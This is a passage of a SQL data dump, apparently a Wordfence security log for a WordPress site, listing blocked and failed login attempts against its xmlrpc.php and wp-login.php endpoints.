Network',NULL),(10405,0.000000,1630753303.219045,'\0\0\0\0\0\0\0\0\0\0���ǝ�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10406,0.000000,1630753493.781714,'\0\0\0\0\0\0\0\0\0\0��/�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10407,0.000000,1630753690.044326,'\0\0\0\0\0\0\0\0\0\0��@�5?',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10408,0.000000,1630753871.047258,'\0\0\0\0\0\0\0\0\0\0��a��',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10409,0.000000,1630753878.519707,'\0\0\0\0\0\0\0\0\0\0��y��',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10410,0.000000,1630753883.512266,'\0\0\0\0\0\0\0\0\0\0��y��',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10411,0.000000,1630753884.308225,'\0\0\0\0\0\0\0\0\0\0��#ժ�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10412,0.000000,1630753888.943584,'\0\0\0\0\0\0\0\0\0\0��y��',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10413,0.000000,1630753893.568307,'\0\0\0\0\0\0\0\0\0\0��y��',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10414,0.000000,1630753898.994131,'\0\0\0\0\0\0\0\0\0\0��y��',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10415,0.000000,1630753902.326070,'\0\0\0\0\0\0\0\0\0\0��y��',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10416,0.000000,1630753906.546307,'\0\0\0\0\0\0\0\0\0\0��y��',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10417,1630754077.574838,1630754077.480300,'\0\0\0\0\0\0\0\0\0\0��#ժ�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(10418,0.000000,1630754292.257964,'\0\0\0\0\0\0\0\0\0\0��B!�~',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10419,0.000000,1630754489.893489,'\0\0\0\0\0\0\0\0\0\0����r',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10420,0.000000,1630754691.078454,'\0\0\0\0\0\0\0\0\0\0��Bs�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10421,0.000000,1630754880.664760,'\0\0\0\0\0\0\0\0\0\0��[���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10422,0.000000,1630755060.864145,'\0\0\0\0\0\0\0\0\0\0���w',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10423,0.000000,1630755165.841529,'\0\0\0\0\0\0\0\0\0\0�����[',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10424,0.000000,1630756616.950245,'\0\0\0\0\0\0\0\0\0\0��B��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10425,0.000000,1630756795.983852,'\0\0\0\0\0\0\0\0\0\0����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10426,0.000000,1630757147.971443,'\0\0\0\0\0\0\0\0\0\0��.���',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10427,1630757150.826691,1630757150.735300,'\0\0\0\0\0\0\0\0\0\0��.���',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(10428,1630757150.415223,1630757150.297400,'\0\0\0\0\0\0\0\0\0\0��.���',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(10429,1630757149.982627,1630757149.890500,'\0\0\0\0\0\0\0\0\0\0��.���',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(10430,1630757149.588046,1630757149.479600,'\0\0\0\0\0\0\0\0\0\0��.���',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(10431,1630757149.158393,1630757149.066100,'\0\0\0\0\0\0\0\0\0\0��.���',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(10432,0.000000,1630757158.365905,'\0\0\0\0\0\0\0\0\0\0����4�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10433,1630757168.348597,1630757168.220600,'\0\0\0\0\0\0\0\0\0\0����4�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(10434,1630757164.294604,1630757164.175400,'\0\0\0\0\0\0\0\0\0\0����4�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(10435,1630757161.523313,1630757161.433200,'\0\0\0\0\0\0\0\0\0\0����4�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(10436,0.000000,1630757176.497656,'\0\0\0\0\0\0\0\0\0\0����',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','loginFailInvalidUsername',NULL,NULL),(10437,0.000000,1630757178.447124,'\0\0\0\0\0\0\0\0\0\0��Kw��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10438,0.000000,1630757183.043980,'\0\0\0\0\0\0\0\0\0\0����f�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10439,0.000000,1630757241.666141,'\0\0\0\0\0\0\0\0\0\0���;U�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10440,0.000000,1630757383.349570,'\0\0\0\0\0\0\0\0\0\0��>�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10441,0.000000,1630757571.818362,'\0\0\0\0\0\0\0\0\0\0��3D(',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10442,0.000000,1630757767.501017,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10443,0.000000,1630758145.741952,'\0\0\0\0\0\0\0\0\0\0���5�i',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10444,0.000000,1630758366.482040,'\0\0\0\0\0\0\0\0\0\0���]��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10445,0.000000,1630758547.253158,'\0\0\0\0\0\0\0\0\0\0���#H',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10446,0.000000,1630758742.613631,'\0\0\0\0\0\0\0\0\0\0��C��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10447,0.000000,1630758906.063446,'\0\0\0\0\0\0\0\0\0\0��-���',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','https://www.dogstardesign.co.uk','Opera/9.80 (Windows NT 6.1; WOW64; MRA 6.3 (build 8050)) Presto/2.12.388 Version/12.16','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10448,0.000000,1630758944.139955,'\0\0\0\0\0\0\0\0\0\0����~�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10449,0.000000,1630759146.393099,'\0\0\0\0\0\0\0\0\0\0��}Ϋ�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10450,0.000000,1630759347.617191,'\0\0\0\0\0\0\0\0\0\0��t>�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10451,0.000000,1630759576.005914,'\0\0\0\0\0\0\0\0\0\0��-��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10452,0.000000,1630759784.737562,'\0\0\0\0\0\0\0\0\0\0��Bs�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10453,0.000000,1630759993.331549,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10454,0.000000,1630760109.030663,'\0\0\0\0\0\0\0\0\0\0��E��x',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10455,0.000000,1630760190.155688,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10456,0.000000,1630760401.242687,'\0\0\0\0\0\0\0\0\0\0��g���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10457,0.000000,1630760610.558168,'\0\0\0\0\0\0\0\0\0\0��m��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10458,0.000000,1630760790.311335,'\0\0\0\0\0\0\0\0\0\0��/�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10459,0.000000,1630761015.883496,'\0\0\0\0\0\0\0\0\0\0���˰R',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10460,0.000000,1630761221.349682,'\0\0\0\0\0\0\0\0\0\0���c9',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10461,0.000000,1630761406.503872,'\0\0\0\0\0\0\0\0\0\0��˖0v',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10462,0.000000,1630761627.594389,'\0\0\0\0\0\0\0\0\0\0���Ue/',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10463,0.000000,1630761666.924982,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10464,0.000000,1630761835.778730,'\0\0\0\0\0\0\0\0\0\0��3D(',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10465,0.000000,1630762042.977349,'\0\0\0\0\0\0\0\0\0\0��\\5x�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10466,0.000000,1630762210.173793,'\0\0\0\0\0\0\0\0\0\0��#�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10467,0.000000,1630762234.154165,'\0\0\0\0\0\0\0\0\0\0���A�O',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10468,0.000000,1630762453.490581,'\0\0\0\0\0\0\0\0\0\0���Dm',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10469,0.000000,1630763085.504688,'\0\0\0\0\0\0\0\0\0\0���[K ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10470,0.000000,1630763305.483209,'\0\0\0\0\0\0\0\0\0\0��m�;-',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10471,0.000000,1630763524.731097,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(10472,0.000000,1630763718.835330,'\0\0\0\0\0\0\0\0\0\0��ár�',0,200,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(10473,0.000000,1630763937.530623,'\0\0\0\0\0\0\0\0\0\0��>���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10474,0.000000,1630764167.108268,'\0\0\0\0\0\0\0\0\0\0��3Y��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10475,0.000000,1630764321.325185,'\0\0\0\0\0\0\0\0\0\0��gm',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10476,0.000000,1630764376.925735,'\0\0\0\0\0\0\0\0\0\0���Dc�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10477,0.000000,1630764597.158384,'\0\0\0\0\0\0\0\0\0\0��]qo\"',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10478,0.000000,1630764814.177733,'\0\0\0\0\0\0\0\0\0\0����s',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10479,0.000000,1630765051.104952,'\0\0\0\0\0\0\0\0\0\0����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10480,0.000000,1630765236.280990,'\0\0\0\0\0\0\0\0\0\0���w',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10481,0.000000,1630765450.980097,'\0\0\0\0\0\0\0\0\0\0��@�5?',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10482,0.000000,1630765677.097558,'\0\0\0\0\0\0\0\0\0\0���7�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10483,0.000000,1630765887.960733,'\0\0\0\0\0\0\0\0\0\0���z.�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10484,0.000000,1630766115.792345,'\0\0\0\0\0\0\0\0\0\0��3[{�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10485,0.000000,1630766322.935217,'\0\0\0\0\0\0\0\0\0\0��|(��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10486,0.000000,1630766452.372441,'\0\0\0\0\0\0\0\0\0\0��\"P�R',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10487,0.000000,1630766547.288728,'\0\0\0\0\0\0\0\0\0\0��_o�)',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10488,0.000000,1630766763.857062,'\0\0\0\0\0\0\0\0\0\0���a��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10489,0.000000,1630766969.217269,'\0\0\0\0\0\0\0\0\0\0��h�*d',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10490,0.000000,1630767206.860555,'\0\0\0\0\0\0\0\0\0\0��Bs�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10491,0.000000,1630767431.949635,'\0\0\0\0\0\0\0\0\0\0��t���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security 